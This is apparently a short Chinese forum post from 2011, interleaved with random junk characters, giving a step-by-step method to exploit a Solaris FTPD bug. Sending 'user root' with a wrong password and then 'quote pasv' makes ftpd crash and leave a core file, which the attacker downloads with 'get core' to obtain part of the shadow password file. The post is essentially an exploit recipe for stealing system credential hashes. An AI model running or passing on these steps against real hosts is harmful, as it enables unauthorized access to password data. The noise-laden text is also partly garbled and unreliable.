該方法利用了Solaris 操作系統(tǒng)中FTPD的一個BUG����,使得用戶可以獲得該機的口令文件����。具體過程如下:
; X, j, c. @# z( @
: x+ q. ?4 v- Y1 Z" q) o1.通過 ftp 正常登錄到目的主機上
4 L( w: X# z8 H7 k: |. F/ y$ x. X# Y1 q1 D- x7 }
2.輸入如下命令序列: r+ `8 ?0 w; A' ~4 v0 I
% j+ d+ c- E( C: d& N
ftp> user root wrongpasswd
+ Y4 B2 ?" w! X. E. D1 L! v4 v8 t/ x/ n% x* A6 U) U5 u
ftp> quote pasv
4 {4 [" p* j' ] Q
2 _5 e$ [9 A+ G2 g& y- L. p3.這時����,ftpd會報錯退出,同時會在當(dāng)前目錄下生成一個core�,口令文件就包含在這個core中。2 X+ ^, p# u, ?
% @& C6 @$ z9 d1 B9 g) P/ Y2 J7 |4.再次進入FTP >get core, z* k) J$ _: r1 T, I
/ D) ^8 y4 C$ M1 F' ^) l! [. s
補充:雖然在core只有一部分shadow���,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了$ Q* N$ a9 u- S! ^/ [' |
- f& U( i8 w5 @+ O
|
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡